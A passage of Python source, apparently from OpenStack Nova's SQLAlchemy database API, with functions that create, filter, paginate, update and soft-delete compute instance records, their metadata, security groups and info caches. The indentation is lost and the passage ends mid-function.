def virtual_interface_delete_by_instance(context, instance_uuid):
"""Delete virtual interface records that are associated
with the instance given by instance_id.
:param instance_uuid: = uuid of instance
"""
_virtual_interface_query(context).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
@require_context
@pick_context_manager_reader
def virtual_interface_get_all(context):
"""Get all vifs."""
vif_refs = _virtual_interface_query(context).all()
return vif_refs
###################
def _metadata_refs(metadata_dict, meta_class):
metadata_refs = []
if metadata_dict:
for k, v in metadata_dict.items():
metadata_ref = meta_class()
metadata_ref['key'] = k
metadata_ref['value'] = v
metadata_refs.append(metadata_ref)
return metadata_refs
def _validate_unique_server_name(context, name):
if not CONF.osapi_compute_unique_server_name_scope:
return
lowername = name.lower()
base_query = model_query(context, models.Instance, read_deleted='no').\
filter(func.lower(models.Instance.hostname) == lowername)
if CONF.osapi_compute_unique_server_name_scope == 'project':
instance_with_same_name = base_query.\
filter_by(project_id=context.project_id).\
count()
elif CONF.osapi_compute_unique_server_name_scope == 'global':
instance_with_same_name = base_query.count()
else:
msg = _('Unknown osapi_compute_unique_server_name_scope value: %s'
' Flag must be empty, "global" or'
' "project"') % CONF.osapi_compute_unique_server_name_scope
LOG.warning(msg)
return
if instance_with_same_name > 0:
raise exception.InstanceExists(name=lowername)
def _handle_objects_related_type_conversions(values):
"""Make sure that certain things in values (which may have come from
an objects.instance.Instance object) are in suitable form for the
database.
"""
# NOTE(danms): Make sure IP addresses are passed as strings to
# the database engine
for key in ('access_ip_v4', 'access_ip_v6'):
if key in values and values[key] is not None:
values[key] = str(values[key])
datetime_keys = ('created_at', 'deleted_at', 'updated_at',
'launched_at', 'terminated_at')
convert_objects_related_datetimes(values, *datetime_keys)
def _check_instance_exists_in_project(context, instance_uuid):
if not model_query(context, models.Instance, read_deleted="no",
project_only=True).filter_by(
uuid=instance_uuid).first():
raise exception.InstanceNotFound(instance_id=instance_uuid)
@require_context
@pick_context_manager_writer
def instance_create(context, values):
"""Create a new Instance record in the database.
context - request context object
values - dict containing column values.
"""
security_group_ensure_default(context)
values = values.copy()
values['metadata'] = _metadata_refs(
values.get('metadata'), models.InstanceMetadata)
values['system_metadata'] = _metadata_refs(
values.get('system_metadata'), models.InstanceSystemMetadata)
_handle_objects_related_type_conversions(values)
instance_ref = models.Instance()
if not values.get('uuid'):
values['uuid'] = str(uuid.uuid4())
instance_ref['info_cache'] = models.InstanceInfoCache()
info_cache = values.pop('info_cache', None)
if info_cache is not None:
instance_ref['info_cache'].update(info_cache)
security_groups = values.pop('security_groups', [])
instance_ref['extra'] = models.InstanceExtra()
instance_ref['extra'].update(
{'numa_topology': None,
'pci_requests': None,
'vcpu_model': None,
})
instance_ref['extra'].update(values.pop('extra', {}))
instance_ref.update(values)
def _get_sec_group_models(security_groups):
models = []
default_group = _security_group_ensure_default(context)
if 'default' in security_groups:
models.append(default_group)
# Generate a new list, so we don't modify the original
security_groups = [x for x in security_groups if x != 'default']
if security_groups:
models.extend(_security_group_get_by_names(context,
context.project_id, security_groups))
return models
if 'hostname' in values:
_validate_unique_server_name(context, values['hostname'])
instance_ref.security_groups = _get_sec_group_models(security_groups)
context.session.add(instance_ref)
# create the instance uuid to ec2_id mapping entry for instance
ec2_instance_create(context, instance_ref['uuid'])
return instance_ref
def _instance_data_get_for_user(context, project_id, user_id):
result = model_query(context, models.Instance, (
func.count(models.Instance.id),
func.sum(models.Instance.vcpus),
func.sum(models.Instance.memory_mb))).\
filter_by(project_id=project_id)
if user_id:
result = result.filter_by(user_id=user_id).first()
else:
result = result.first()
# NOTE(vish): convert None to 0
return (result[0] or 0, result[1] or 0, result[2] or 0)
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@pick_context_manager_writer
def instance_destroy(context, instance_uuid, constraint=None):
if uuidutils.is_uuid_like(instance_uuid):
instance_ref = _instance_get_by_uuid(context, instance_uuid)
else:
raise exception.InvalidUUID(instance_uuid)
query = model_query(context, models.Instance).\
filter_by(uuid=instance_uuid)
if constraint is not None:
query = constraint.apply(models.Instance, query)
count = query.soft_delete()
if count == 0:
raise exception.ConstraintNotMet()
model_query(context, models.SecurityGroupInstanceAssociation).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
model_query(context, models.InstanceInfoCache).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
model_query(context, models.InstanceMetadata).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
model_query(context, models.InstanceFault).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
model_query(context, models.InstanceExtra).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
model_query(context, models.InstanceSystemMetadata).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
# NOTE(snikitin): We can't use model_query here, because there is no
# column 'deleted' in 'tags' table.
context.session.query(models.Tag).filter_by(
resource_id=instance_uuid).delete()
return instance_ref
@require_context
@pick_context_manager_reader_allow_async
def instance_get_by_uuid(context, uuid, columns_to_join=None):
return _instance_get_by_uuid(context, uuid,
columns_to_join=columns_to_join)
def _instance_get_by_uuid(context, uuid, columns_to_join=None):
result = _build_instance_get(context, columns_to_join=columns_to_join).\
filter_by(uuid=uuid).\
first()
if not result:
raise exception.InstanceNotFound(instance_id=uuid)
return result
@require_context
@pick_context_manager_reader
def instance_get(context, instance_id, columns_to_join=None):
try:
result = _build_instance_get(context, columns_to_join=columns_to_join
).filter_by(id=instance_id).first()
if not result:
raise exception.InstanceNotFound(instance_id=instance_id)
return result
except db_exc.DBError:
# NOTE(sdague): catch all in case the db engine chokes on the
# id because it's too long of an int to store.
msg = _("Invalid instance id %s in request") % instance_id
LOG.warning(msg)
raise exception.InvalidID(id=instance_id)
def _build_instance_get(context, columns_to_join=None):
query = model_query(context, models.Instance, project_only=True).\
options(joinedload_all('security_groups.rules')).\
options(joinedload('info_cache'))
if columns_to_join is None:
columns_to_join = ['metadata', 'system_metadata']
for column in columns_to_join:
if column in ['info_cache', 'security_groups']:
# Already always joined above
continue
if 'extra.' in column:
query = query.options(undefer(column))
else:
query = query.options(joinedload(column))
# NOTE(alaski) Stop lazy loading of columns not needed.
for col in ['metadata', 'system_metadata']:
if col not in columns_to_join:
query = query.options(noload(col))
return query
def _instances_fill_metadata(context, instances, manual_joins=None):
"""Selectively fill instances with manually-joined metadata. Note that
instance will be converted to a dict.
:param context: security context
:param instances: list of instances to fill
:param manual_joins: list of tables to manually join (can be any
combination of 'metadata' and 'system_metadata' or
None to take the default of both)
"""
uuids = [inst['uuid'] for inst in instances]
if manual_joins is None:
manual_joins = ['metadata', 'system_metadata']
meta = collections.defaultdict(list)
if 'metadata' in manual_joins:
for row in _instance_metadata_get_multi(context, uuids):
meta[row['instance_uuid']].append(row)
sys_meta = collections.defaultdict(list)
if 'system_metadata' in manual_joins:
for row in _instance_system_metadata_get_multi(context, uuids):
sys_meta[row['instance_uuid']].append(row)
pcidevs = collections.defaultdict(list)
if 'pci_devices' in manual_joins:
for row in _instance_pcidevs_get_multi(context, uuids):
pcidevs[row['instance_uuid']].append(row)
filled_instances = []
for inst in instances:
inst = dict(inst)
inst['system_metadata'] = sys_meta[inst['uuid']]
inst['metadata'] = meta[inst['uuid']]
if 'pci_devices' in manual_joins:
inst['pci_devices'] = pcidevs[inst['uuid']]
filled_instances.append(inst)
return filled_instances
def _manual_join_columns(columns_to_join):
"""Separate manually joined columns from columns_to_join
If columns_to_join contains 'metadata', 'system_metadata', or
'pci_devices' those columns are removed from columns_to_join and added
to a manual_joins list to be used with the _instances_fill_metadata method.
The columns_to_join formal parameter is copied and not modified, the return
tuple has the modified columns_to_join list to be used with joinedload in
a model query.
:param:columns_to_join: List of columns to join in a model query.
:return: tuple of (manual_joins, columns_to_join)
"""
manual_joins = []
columns_to_join_new = copy.copy(columns_to_join)
for column in ('metadata', 'system_metadata', 'pci_devices'):
if column in columns_to_join_new:
columns_to_join_new.remove(column)
manual_joins.append(column)
return manual_joins, columns_to_join_new
@require_context
@pick_context_manager_reader
def instance_get_all(context, columns_to_join=None):
if columns_to_join is None:
columns_to_join_new = ['info_cache', 'security_groups']
manual_joins = ['metadata', 'system_metadata']
else:
manual_joins, columns_to_join_new = (
_manual_join_columns(columns_to_join))
query = model_query(context, models.Instance)
for column in columns_to_join_new:
query = query.options(joinedload(column))
if not context.is_admin:
# If we're not admin context, add appropriate filter..
if context.project_id:
query = query.filter_by(project_id=context.project_id)
else:
query = query.filter_by(user_id=context.user_id)
instances = query.all()
return _instances_fill_metadata(context, instances, manual_joins)
@require_context
@pick_context_manager_reader_allow_async
def instance_get_all_by_filters(context, filters, sort_key, sort_dir,
limit=None, marker=None, columns_to_join=None):
"""Return instances matching all filters sorted by the primary key.
See instance_get_all_by_filters_sort for more information.
"""
# Invoke the API with the multiple sort keys and directions using the
# single sort key/direction
return instance_get_all_by_filters_sort(context, filters, limit=limit,
marker=marker,
columns_to_join=columns_to_join,
sort_keys=[sort_key],
sort_dirs=[sort_dir])
@require_context
@pick_context_manager_reader_allow_async
def instance_get_all_by_filters_sort(context, filters, limit=None, marker=None,
columns_to_join=None, sort_keys=None,
sort_dirs=None):
"""Return instances that match all filters sorted by the given keys.
Deleted instances will be returned by default, unless there's a filter that
says otherwise.
Depending on the name of a filter, matching for that filter is
performed using either exact matching or as regular expression
matching. Exact matching is applied for the following filters::
| ['project_id', 'user_id', 'image_ref',
| 'vm_state', 'instance_type_id', 'uuid',
| 'metadata', 'host', 'system_metadata']
A third type of filter (also using exact matching), filters
based on instance metadata tags when supplied under a special
key named 'filter'::
| filters = {
| 'filter': [
| {'name': 'tag-key', 'value': '<metakey>'},
| {'name': 'tag-value', 'value': '<metaval>'},
| {'name': 'tag:<metakey>', 'value': '<metaval>'}
| ]
| }
Special keys are used to tweek the query further::
| 'changes-since' - only return instances updated after
| 'deleted' - only return (or exclude) deleted instances
| 'soft_deleted' - modify behavior of 'deleted' to either
| include or exclude instances whose
| vm_state is SOFT_DELETED.
A fourth type of filter (also using exact matching), filters
based on instance tags (not metadata tags). There are two types
of these tags:
`tags` -- One or more strings that will be used to filter results
in an AND expression.
`tags-any` -- One or more strings that will be used to filter results in
an OR expression.
Tags should be represented as list::
| filters = {
| 'tags': [some-tag, some-another-tag],
| 'tags-any: [some-any-tag, some-another-any-tag]
| }
"""
# NOTE(mriedem): If the limit is 0 there is no point in even going
# to the database since nothing is going to be returned anyway.
if limit == 0:
return []
sort_keys, sort_dirs = process_sort_params(sort_keys,
sort_dirs,
default_dir='desc')
if columns_to_join is None:
columns_to_join_new = ['info_cache', 'security_groups']
manual_joins = ['metadata', 'system_metadata']
else:
manual_joins, columns_to_join_new = (
_manual_join_columns(columns_to_join))
query_prefix = context.session.query(models.Instance)
for column in columns_to_join_new:
if 'extra.' in column:
query_prefix = query_prefix.options(undefer(column))
else:
query_prefix = query_prefix.options(joinedload(column))
# Note: order_by is done in the sqlalchemy.utils.py paginate_query(),
# no need to do it here as well
# Make a copy of the filters dictionary to use going forward, as we'll
# be modifying it and we shouldn't affect the caller's use of it.
filters = filters.copy()
if 'changes-since' in filters:
changes_since = timeutils.normalize_time(filters['changes-since'])
query_prefix = query_prefix.\
filter(models.Instance.updated_at >= changes_since)
if 'deleted' in filters:
# Instances can be soft or hard deleted and the query needs to
# include or exclude both
deleted = filters.pop('deleted')
if deleted:
if filters.pop('soft_deleted', True):
delete = or_(
models.Instance.deleted == models.Instance.id,
models.Instance.vm_state == vm_states.SOFT_DELETED
)
query_prefix = query_prefix.\
filter(delete)
else:
query_prefix = query_prefix.\
filter(models.Instance.deleted == models.Instance.id)
else:
query_prefix = query_prefix.\
filter_by(deleted=0)
if not filters.pop('soft_deleted', False):
# It would be better to have vm_state not be nullable
# but until then we test it explicitly as a workaround.
not_soft_deleted = or_(
models.Instance.vm_state != vm_states.SOFT_DELETED,
models.Instance.vm_state == null()
)
query_prefix = query_prefix.filter(not_soft_deleted)
if 'cleaned' in filters:
if filters.pop('cleaned'):
query_prefix = query_prefix.filter(models.Instance.cleaned == 1)
else:
query_prefix = query_prefix.filter(models.Instance.cleaned == 0)
if 'tags' in filters:
tags = filters.pop('tags')
# We build a JOIN ladder expression for each tag, JOIN'ing
# the first tag to the instances table, and each subsequent
# tag to the last JOIN'd tags table
first_tag = tags.pop(0)
query_prefix = query_prefix.join(models.Instance.tags)
query_prefix = query_prefix.filter(models.Tag.tag == first_tag)
for tag in tags:
tag_alias = aliased(models.Tag)
query_prefix = query_prefix.join(tag_alias,
models.Instance.tags)
query_prefix = query_prefix.filter(tag_alias.tag == tag)
if 'tags-any' in filters:
tags = filters.pop('tags-any')
tag_alias = aliased(models.Tag)
query_prefix = query_prefix.join(tag_alias, models.Instance.tags)
query_prefix = query_prefix.filter(tag_alias.tag.in_(tags))
if not context.is_admin:
# If we're not admin context, add appropriate filter..
if context.project_id:
filters['project_id'] = context.project_id
else:
filters['user_id'] = context.user_id
# Filters for exact matches that we can do along with the SQL query...
# For other filters that don't match this, we will do regexp matching
exact_match_filter_names = ['project_id', 'user_id', 'image_ref',
'vm_state', 'instance_type_id', 'uuid',
'metadata', 'host', 'task_state',
'system_metadata']
# Filter the query
query_prefix = _exact_instance_filter(query_prefix,
filters, exact_match_filter_names)
if query_prefix is None:
return []
query_prefix = _regex_instance_filter(query_prefix, filters)
query_prefix = _tag_instance_filter(context, query_prefix, filters)
# paginate query
if marker is not None:
try:
marker = _instance_get_by_uuid(
context.elevated(read_deleted='yes'), marker)
except exception.InstanceNotFound:
raise exception.MarkerNotFound(marker)
try:
query_prefix = sqlalchemyutils.paginate_query(query_prefix,
models.Instance, limit,
sort_keys,
marker=marker,
sort_dirs=sort_dirs)
except db_exc.InvalidSortKey:
raise exception.InvalidSortKey()
return _instances_fill_metadata(context, query_prefix.all(), manual_joins)
def _tag_instance_filter(context, query, filters):
"""Applies tag filtering to an Instance query.
Returns the updated query. This method alters filters to remove
keys that are tags. This filters on resources by tags - this
method assumes that the caller will take care of access control
:param context: request context object
:param query: query to apply filters to
:param filters: dictionary of filters
"""
if filters.get('filter') is None:
return query
model = models.Instance
model_metadata = models.InstanceMetadata
model_uuid = model_metadata.instance_uuid
or_query = None
def _to_list(val):
if isinstance(val, dict):
val = val.values()
if not isinstance(val, (tuple, list, set)):
val = (val,)
return val
for filter_block in filters['filter']:
if not isinstance(filter_block, dict):
continue
filter_name = filter_block.get('name')
if filter_name is None:
continue
tag_name = filter_name[4:]
tag_val = _to_list(filter_block.get('value'))
if filter_name.startswith('tag-'):
if tag_name not in ['key', 'value']:
msg = _("Invalid field name: %s") % tag_name
raise exception.InvalidParameterValue(err=msg)
subq = getattr(model_metadata, tag_name).in_(tag_val)
or_query = subq if or_query is None else or_(or_query, subq)
elif filter_name.startswith('tag:'):
subq = model_query(context, model_metadata, (model_uuid,)).\
filter_by(key=tag_name).\
filter(model_metadata.value.in_(tag_val))
query = query.filter(model.uuid.in_(subq))
if or_query is not None:
subq = model_query(context, model_metadata, (model_uuid,)).\
filter(or_query)
query = query.filter(model.uuid.in_(subq))
return query
def _get_regexp_op_for_connection(db_connection):
db_string = db_connection.split(':')[0].split('+')[0]
regexp_op_map = {
'postgresql': '~',
'mysql': 'REGEXP',
'sqlite': 'REGEXP'
}
return regexp_op_map.get(db_string, 'LIKE')
def _regex_instance_filter(query, filters):
"""Applies regular expression filtering to an Instance query.
Returns the updated query.
:param query: query to apply filters to
:param filters: dictionary of filters with regex values
"""
model = models.Instance
db_regexp_op = _get_regexp_op_for_connection(CONF.database.connection)
for filter_name in filters:
try:
column_attr = getattr(model, filter_name)
except AttributeError:
continue
if 'property' == type(column_attr).__name__:
continue
filter_val = filters[filter_name]
# Sometimes the REGEX filter value is not a string
if not isinstance(filter_val, six.string_types):
filter_val = str(filter_val)
if db_regexp_op == 'LIKE':
query = query.filter(column_attr.op(db_regexp_op)(
u'%' + filter_val + u'%'))
else:
query = query.filter(column_attr.op(db_regexp_op)(
filter_val))
return query
def _exact_instance_filter(query, filters, legal_keys):
"""Applies exact match filtering to an Instance query.
Returns the updated query. Modifies filters argument to remove
filters consumed.
:param query: query to apply filters to
:param filters: dictionary of filters; values that are lists,
tuples, sets, or frozensets cause an 'IN' test to
be performed, while exact matching ('==' operator)
is used for other values
:param legal_keys: list of keys to apply exact filtering to
"""
filter_dict = {}
model = models.Instance
# Walk through all the keys
for key in legal_keys:
# Skip ones we're not filtering on
if key not in filters:
continue
# OK, filtering on this key; what value do we search for?
value = filters.pop(key)
if key in ('metadata', 'system_metadata'):
column_attr = getattr(model, key)
if isinstance(value, list):
for item in value:
for k, v in item.items():
query = query.filter(column_attr.any(key=k))
query = query.filter(column_attr.any(value=v))
else:
for k, v in value.items():
query = query.filter(column_attr.any(key=k))
query = query.filter(column_attr.any(value=v))
elif isinstance(value, (list, tuple, set, frozenset)):
if not value:
return None # empty IN-predicate; short circuit
# Looking for values in a list; apply to query directly
column_attr = getattr(model, key)
query = query.filter(column_attr.in_(value))
else:
# OK, simple exact match; save for later
filter_dict[key] = value
# Apply simple exact matches
if filter_dict:
query = query.filter(*[getattr(models.Instance, k) == v
for k, v in filter_dict.items()])
return query
def process_sort_params(sort_keys, sort_dirs,
default_keys=['created_at', 'id'],
default_dir='asc'):
"""Process the sort parameters to include default keys.
Creates a list of sort keys and a list of sort directions. Adds the default
keys to the end of the list if they are not already included.
When adding the default keys to the sort keys list, the associated
direction is:
1) The first element in the 'sort_dirs' list (if specified), else
2) 'default_dir' value (Note that 'asc' is the default value since this is
the default in sqlalchemy.utils.paginate_query)
:param sort_keys: List of sort keys to include in the processed list
:param sort_dirs: List of sort directions to include in the processed list
:param default_keys: List of sort keys that need to be included in the
processed list, they are added at the end of the list
if not already specified.
:param default_dir: Sort direction associated with each of the default
keys that are not supplied, used when they are added
to the processed list
:returns: list of sort keys, list of sort directions
:raise exception.InvalidInput: If more sort directions than sort keys
are specified or if an invalid sort
direction is specified
"""
# Determine direction to use for when adding default keys
if sort_dirs and len(sort_dirs) != 0:
default_dir_value = sort_dirs[0]
else:
default_dir_value = default_dir
# Create list of keys (do not modify the input list)
if sort_keys:
result_keys = list(sort_keys)
else:
result_keys = []
# If a list of directions is not provided, use the default sort direction
# for all provided keys
if sort_dirs:
result_dirs = []
# Verify sort direction
for sort_dir in sort_dirs:
if sort_dir not in ('asc', 'desc'):
msg = _("Unknown sort direction, must be 'desc' or 'asc'")
raise exception.InvalidInput(reason=msg)
result_dirs.append(sort_dir)
else:
result_dirs = [default_dir_value for _sort_key in result_keys]
# Ensure that the key and direction length match
while len(result_dirs) < len(result_keys):
result_dirs.append(default_dir_value)
# Unless more direction are specified, which is an error
if len(result_dirs) > len(result_keys):
msg = _("Sort direction size exceeds sort key size")
raise exception.InvalidInput(reason=msg)
# Ensure defaults are included
for key in default_keys:
if key not in result_keys:
result_keys.append(key)
result_dirs.append(default_dir_value)
return result_keys, result_dirs
@require_context
@pick_context_manager_reader_allow_async
def instance_get_active_by_window_joined(context, begin, end=None,
project_id=None, host=None,
columns_to_join=None):
"""Return instances and joins that were active during window."""
query = context.session.query(models.Instance)
if columns_to_join is None:
columns_to_join_new = ['info_cache', 'security_groups']
manual_joins = ['metadata', 'system_metadata']
else:
manual_joins, columns_to_join_new = (
_manual_join_columns(columns_to_join))
for column in columns_to_join_new:
if 'extra.' in column:
query = query.options(undefer(column))
else:
query = query.options(joinedload(column))
query = query.filter(or_(models.Instance.terminated_at == null(),
models.Instance.terminated_at > begin))
if end:
query = query.filter(models.Instance.launched_at < end)
if project_id:
query = query.filter_by(project_id=project_id)
if host:
query = query.filter_by(host=host)
return _instances_fill_metadata(context, query.all(), manual_joins)
def _instance_get_all_query(context, project_only=False, joins=None):
if joins is None:
joins = ['info_cache', 'security_groups']
query = model_query(context,
models.Instance,
project_only=project_only)
for column in joins:
if 'extra.' in column:
query = query.options(undefer(column))
else:
query = query.options(joinedload(column))
return query
@pick_context_manager_reader_allow_async
def instance_get_all_by_host(context, host, columns_to_join=None):
return _instances_fill_metadata(context,
_instance_get_all_query(context).filter_by(host=host).all(),
manual_joins=columns_to_join)
def _instance_get_all_uuids_by_host(context, host):
"""Return a list of the instance uuids on a given host.
Returns a list of UUIDs, not Instance model objects.
"""
uuids = []
for tuple in model_query(context, models.Instance, (models.Instance.uuid,),
read_deleted="no").\
filter_by(host=host).\
all():
uuids.append(tuple[0])
return uuids
@pick_context_manager_reader
def instance_get_all_by_host_and_node(context, host, node,
columns_to_join=None):
if columns_to_join is None:
manual_joins = []
else:
candidates = ['system_metadata', 'metadata']
manual_joins = [x for x in columns_to_join if x in candidates]
columns_to_join = list(set(columns_to_join) - set(candidates))
return _instances_fill_metadata(context,
_instance_get_all_query(
context,
joins=columns_to_join).filter_by(host=host).
filter_by(node=node).all(), manual_joins=manual_joins)
@pick_context_manager_reader
def instance_get_all_by_host_and_not_type(context, host, type_id=None):
return _instances_fill_metadata(context,
_instance_get_all_query(context).filter_by(host=host).
filter(models.Instance.instance_type_id != type_id).all())
@pick_context_manager_reader
def instance_get_all_by_grantee_security_groups(context, group_ids):
if not group_ids:
return []
return _instances_fill_metadata(context,
_instance_get_all_query(context).
join(models.Instance.security_groups).
filter(models.SecurityGroup.rules.any(
models.SecurityGroupIngressRule.group_id.in_(group_ids))).
all())
@require_context
@main_context_manager.reader
def instance_floating_address_get_all(context, instance_uuid):
if not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(uuid=instance_uuid)
floating_ips = model_query(context,
models.FloatingIp,
(models.FloatingIp.address,)).\
join(models.FloatingIp.fixed_ip).\
filter_by(instance_uuid=instance_uuid)
return [floating_ip.address for floating_ip in floating_ips]
# NOTE(hanlind): This method can be removed as conductor RPC API moves to v2.0.
@pick_context_manager_reader
def instance_get_all_hung_in_rebooting(context, reboot_window):
reboot_window = (timeutils.utcnow() -
datetime.timedelta(seconds=reboot_window))
# NOTE(danms): this is only used in the _poll_rebooting_instances()
# call in compute/manager, so we can avoid the metadata lookups
# explicitly
return _instances_fill_metadata(context,
model_query(context, models.Instance).
filter(models.Instance.updated_at <= reboot_window).
filter_by(task_state=task_states.REBOOTING).all(),
manual_joins=[])
def _retry_instance_update():
"""Wrap with oslo_db_api.wrap_db_retry, and also retry on
UnknownInstanceUpdateConflict.
"""
exception_checker = \
lambda exc: isinstance(exc, (exception.UnknownInstanceUpdateConflict,))
return oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True,
exception_checker=exception_checker)
@require_context
@_retry_instance_update()
@pick_context_manager_writer
def instance_update(context, instance_uuid, values, expected=None):
return _instance_update(context, instance_uuid, values, expected)
@require_context
@_retry_instance_update()
@pick_context_manager_writer
def instance_update_and_get_original(context, instance_uuid, values,
columns_to_join=None, expected=None):
"""Set the given properties on an instance and update it. Return
a shallow copy of the original instance reference, as well as the
updated one.
:param context: = request context object
:param instance_uuid: = instance uuid
:param values: = dict containing column values
If "expected_task_state" exists in values, the update can only happen
when the task state before update matches expected_task_state. Otherwise
a UnexpectedTaskStateError is thrown.
:returns: a tuple of the form (old_instance_ref, new_instance_ref)
Raises NotFound if instance does not exist.
"""
instance_ref = _instance_get_by_uuid(context, instance_uuid,
columns_to_join=columns_to_join)
return (copy.copy(instance_ref), _instance_update(
context, instance_uuid, values, expected, original=instance_ref))
# NOTE(danms): This updates the instance's metadata list in-place and in
# the database to avoid stale data and refresh issues. It assumes the
# delete=True behavior of instance_metadata_update(...)
def _instance_metadata_update_in_place(context, instance, metadata_type, model,
metadata):
metadata = dict(metadata)
to_delete = []
for keyvalue in instance[metadata_type]:
key = keyvalue['key']
if key in metadata:
keyvalue['value'] = metadata.pop(key)
elif key not in metadata:
to_delete.append(keyvalue)
# NOTE: we have to hard_delete here otherwise we will get more than one
# system_metadata record when we read deleted for an instance;
# regular metadata doesn't have the same problem because we don't
# allow reading deleted regular metadata anywhere.
if metadata_type == 'system_metadata':
for condemned in to_delete:
context.session.delete(condemned)
instance[metadata_type].remove(condemned)
else:
for condemned in to_delete:
condemned.soft_delete(context.session)
for key, value in metadata.items():
newitem = model()
newitem.update({'key': key, 'value': value,
'instance_uuid': instance['uuid']})
context.session.add(newitem)
instance[metadata_type].append(newitem)
def _instance_update(context, instance_uuid, values, expected, original=None):
if not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(instance_uuid)
if expected is None:
expected = {}
else:
# Coerce all single values to singleton lists
expected = {k: [None] if v is None else sqlalchemyutils.to_list(v)
for (k, v) in six.iteritems(expected)}
# Extract 'expected_' values from values dict, as these aren't actually
# updates
for field in ('task_state', 'vm_state'):
expected_field = 'expected_%s' % field
if expected_field in values:
value = values.pop(expected_field, None)
# Coerce all single values to singleton lists
if value is None:
expected[field] = [None]
else:
expected[field] = sqlalchemyutils.to_list(value)
# Values which need to be updated separately
metadata = values.pop('metadata', None)
system_metadata = values.pop('system_metadata', None)
_handle_objects_related_type_conversions(values)
# Hostname is potentially unique, but this is enforced in code rather
# than the DB. The query below races, but the number of users of
# osapi_compute_unique_server_name_scope is small, and a robust fix
# will be complex. This is intentionally left as is for the moment.
if 'hostname' in values:
_validate_unique_server_name(context, values['hostname'])
compare = models.Instance(uuid=instance_uuid, **expected)
try:
instance_ref = model_query(context, models.Instance,
project_only=True).\
update_on_match(compare, 'uuid', values)
except update_match.NoRowsMatched:
# Update failed. Try to find why and raise a specific error.
# We should get here only because our expected values were not current
# when update_on_match executed. Having failed, we now have a hint that
# the values are out of date and should check them.
# This code is made more complex because we are using repeatable reads.
# If we have previously read the original instance in the current
# transaction, reading it again will return the same data, even though
# the above update failed because it has changed: it is not possible to
# determine what has changed in this transaction. In this case we raise
# UnknownInstanceUpdateConflict, which will cause the operation to be
# retried in a new transaction.
# Because of the above, if we have previously read the instance in the
# current transaction it will have been passed as 'original', and there
# is no point refreshing it. If we have not previously read the
# instance, we can fetch it here and we will get fresh data.
if original is None:
original = _instance_get_by_uuid(context, instance_uuid)
conflicts_expected = {}
conflicts_actual = {}
for (field, expected_values) in six.iteritems(expected):
actual = original[field]
if actual not in expected_values:
conflicts_expected[field] = expected_values
conflicts_actual[field] = actual
# Exception properties
exc_props = {
'instance_uuid': instance_uuid,
'expected': conflicts_expected,
'actual': conflicts_actual
}
# There was a conflict, but something (probably the MySQL read view,
# but possibly an exceptionally unlikely second race) is preventing us
# from seeing what it is. When we go round again we'll get a fresh
# transaction and a fresh read view.
if len(conflicts_actual) == 0:
raise exception.UnknownInstanceUpdateConflict(**exc_props)
# Task state gets special handling for convenience. We raise the
# specific error UnexpectedDeletingTaskStateError or
# UnexpectedTaskStateError as appropriate
if 'task_state' in conflicts_actual:
conflict_task_state = conflicts_actual['task_state']
if conflict_task_state == task_states.DELETING:
exc = exception.UnexpectedDeletingTaskStateError
else:
exc = exception.UnexpectedTaskStateError
# Everything else is an InstanceUpdateConflict
else:
exc = exception.InstanceUpdateConflict
raise exc(**exc_props)
if metadata is not None:
_instance_metadata_update_in_place(context, instance_ref,
'metadata',
models.InstanceMetadata,
metadata)
if system_metadata is not None:
_instance_metadata_update_in_place(context, instance_ref,
'system_metadata',
models.InstanceSystemMetadata,
system_metadata)
return instance_ref
@pick_context_manager_writer
def instance_add_security_group(context, instance_uuid, security_group_id):
"""Associate the given security group with the given instance."""
sec_group_ref = models.SecurityGroupInstanceAssociation()
sec_group_ref.update({'instance_uuid': instance_uuid,
'security_group_id': security_group_id})
sec_group_ref.save(context.session)
@require_context
@pick_context_manager_writer
def instance_remove_security_group(context, instance_uuid, security_group_id):
"""Disassociate the given security group from the given instance."""
model_query(context, models.SecurityGroupInstanceAssociation).\
filter_by(instance_uuid=instance_uuid).\
filter_by(security_group_id=security_group_id).\
soft_delete()
###################
@require_context
@pick_context_manager_reader
def instance_info_cache_get(context, instance_uuid):
"""Gets an instance info cache from the table.
:param instance_uuid: = uuid of the info cache's instance
"""
return model_query(context, models.InstanceInfoCache).\
filter_by(instance_uuid=instance_uuid).\
first()
@require_context
@pick_context_manager_writer
def instance_info_cache_update(context, instance_uuid, values):
"""Update an instance info cache record in the table.
:param instance_uuid: = uuid of info cache's instance
:param values: = dict containing column values to update
"""
convert_objects_related_datetimes(values)
info_cache = model_query(context, models.InstanceInfoCache).\
filter_by(instance_uuid=instance_uuid).\
first()
needs_create = False
if info_cache and info_cache['deleted']:
raise exception.InstanceInfoCacheNotFound(
instance_uuid=instance_uuid)
elif not info_cache:
# NOTE(tr3buchet): just in case someone blows away an instance's
# cache entry, re-create it.
values['instance_uuid'] = instance_uuid
info_cache = models.InstanceInfoCache(**values)
needs_create = True
try:
with main_context_manager.writer.savepoint.using(context):
if needs_create:
info_cache.save(context.session)
else:
info_cache.update(values)
except db_exc.DBDuplicateEntry:
# NOTE(sirp): Possible race if two greenthreads attempt to
# recreate the instance cache entry at the same time. First one
# wins.
pass
return info_cache
@require_context
@pick_context_manager_writer
def instance_info_cache_delete(context, instance_uuid):
"""Deletes an existing instance_info_cache record
:param instance_uuid: = uuid of the instance tied to the cache record
"""
model_query(context, models.InstanceInfoCache).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
###################
def _instance_extra_create(context, values):
inst_extra_ref = models.InstanceExtra()
inst_extra_ref.update(values)
inst_extra_ref.save(context.session)
return inst_extra_ref
@pick_context_manager_writer
def instance_extra_update_by_uuid(context, instance_uuid, values):
rows_updated = model_query(context, models.InstanceExtra).\
filter_by(instance_uuid=instance_uuid).\
update(values)
if not rows_updated:
LOG.debug("Created instance_extra for %s", instance_uuid)
create_values = copy.copy(values)
create_values["instance_uuid"] = instance_uuid
_instance_extra_create(context, create_values)
rows_updated = 1
return rows_updated
@pick_context_manager_reader
def instance_extra_get_by_instance_uuid(context, instance_uuid,
columns=None):
query = model_query(context, models.InstanceExtra).\
